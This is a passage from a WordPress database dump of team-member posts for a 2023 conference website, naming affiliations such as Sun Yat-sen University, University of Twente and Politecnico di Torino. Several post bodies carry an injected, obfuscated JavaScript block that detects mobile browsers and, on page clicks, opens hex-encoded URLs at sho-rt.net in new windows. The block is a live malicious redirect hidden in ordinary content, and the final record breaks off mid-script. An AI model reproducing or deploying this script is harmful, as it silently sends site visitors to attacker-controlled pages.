\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Yiping Chen&nbsp;&nbsp;&nbsp;','','publish','closed','closed','','sun-yat-sen-university-china-wg-i-4','','','2022-10-15 21:03:45','2022-10-15 21:03:45','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2543',0,'dt_team','',0),
(2544,1,'2022-10-07 19:07:27','2022-10-07 19:07:27','','2','','inherit','open','closed','','2-7','','','2022-10-07 19:07:27','2022-10-07 19:07:27','',2543,'https://gsw2023.com/wp-content/uploads/2022/10/2-6.jpg',0,'attachment','image/jpeg',0),
(2545,1,'2022-10-07 19:08:21','2022-10-07 19:08:21','<!-- wp:paragraph -->\n<p>University of Twente The Netherlands</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Francesco Nex</strong>','','publish','closed','closed','','francesco-nex','','','2022-10-09 05:46:19','2022-10-09 05:46:19','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2545',0,'dt_team','',0),
(2546,1,'2022-10-07 19:08:11','2022-10-07 19:08:11','','1','','inherit','open','closed','','1-8','','','2022-10-07 19:08:11','2022-10-07 19:08:11','',2545,'https://gsw2023.com/wp-content/uploads/2022/10/1-7.jpg',0,'attachment','image/jpeg',0),
(2547,1,'2022-10-07 19:08:50','2022-10-07 19:08:50','<!-- wp:paragraph -->\n<p>Politecnico di Torino Italy</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 